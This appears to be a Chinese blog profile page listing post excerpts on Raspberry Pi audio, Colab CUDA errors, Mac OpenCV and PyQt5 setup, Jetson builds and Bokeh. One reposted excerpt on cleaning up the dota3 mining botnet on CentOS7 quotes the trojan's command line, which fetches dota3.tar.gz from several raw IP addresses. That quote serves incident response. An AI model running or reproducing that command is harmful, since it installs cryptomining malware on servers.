- 博客(10)
- 收藏
- 关注
转载 树莓派上播放音乐
转载自:https://ee-fans.com/在树莓派上用python播放音乐的几种方法/,侵删。使用vlc Python binding模块播放成功。在树莓派上播放音乐的方式有很多,最简单的是调用系统命令来播放,一般使用如下命令即可:import osos.system("player XXX.mp3") #player指播放器,是你系统上可以播放音乐的软件但是这种方式有一个问题,就是一旦开始播放便不好通过程序控制播放过程,因为这一命令会fork一个进程来运行命令,即使结束当前的
2022-01-13 10:55:36
3599
原创 colaboratory报错:CUDA status Error: file: ./src/blas_kernels.cu : ()
colaboratory报错:CUDA status Error: file: ./src/blas_kernels.cu : ()CUDAError:nokernelimageisavailableforexecutiononthedevice CUDAError:nokernelimageisavailableforexecutiononthedevice:Fileexists darknet:./src/utils.c:331:error
2021-12-01 16:41:16
3102
原创 Mac M1 Pro 安装配置opencv
笔记本:Macbook M1 Pro搞了老半天才找到新方法,之前找的旧方法没成功,过程做一下记录。零、新方法pip install opencv-pythonpip install opencv-contrib-python一、更新brewbrew的配置见前一篇。这一步很重要,不更新的话安装时会找以前的包,但源网站已没有,导致错误。下载慢可以梯子或更换别的源。brew updatebrew upgrade二、安装opencvbrew install opencv三、配置ope
2021-11-29 18:21:16
1150
2
原创 Mac安装pyqt5
新机:Apple M1 Pro芯片1、安装Homebrew1.下载安装脚本并安装ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"2.配置环境比变量替换路径中的UserName为自己的用户名。echo 'eval "$(/opt/homebrew/bin/brew shellenv)"' >> /Users/UserName/.zprofileeval
2021-11-15 23:44:24
1409
原创 CentOS7 下处理挖矿僵尸网络dota3木马攻击
转载自:https://mip.yht7.com/news/88716先登录阿里云后台,查看安全中心的告警祥情,发现有几条记录:父进程路径:/usr/bin/bash父进程命令行:sh -c ./tddwrt7s.sh “http://67.205.135.65/dota3.tar.gz”“http://91.121.51.120/dota3.tar.gz” “http://51.75.28.134/dota3.tar.gz”“http://159.203.17.176/dota3.tar.gz”
2021-08-11 10:32:16
921
原创 Jetson nano编译Jetson inferece出现:build error GL/glew.h: No such file or directory
build error GL/glew.h: No such file or directory运行:sudo apt-get install libglew-dev之后再运行cmake ../再运行make -j4即可。
2021-04-15 10:02:55
357
原创 Bokeh图表显示在jupyter notebook页面内
Bokeh图表显示在jupyter notebook页面内Bokeh在jupyter notebook中打开时,往往绘制的图表会显示在自动打开的新的tab页面内,如何显示在本页中呢?需要在项目中加入如下代码:from bokeh.plotting import output_notebook%matplotlib inlineoutput_notebook()示例:# 导入相关库from bokeh.plotting import figure, output_notebook, sho
2020-09-21 11:53:09
1523
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人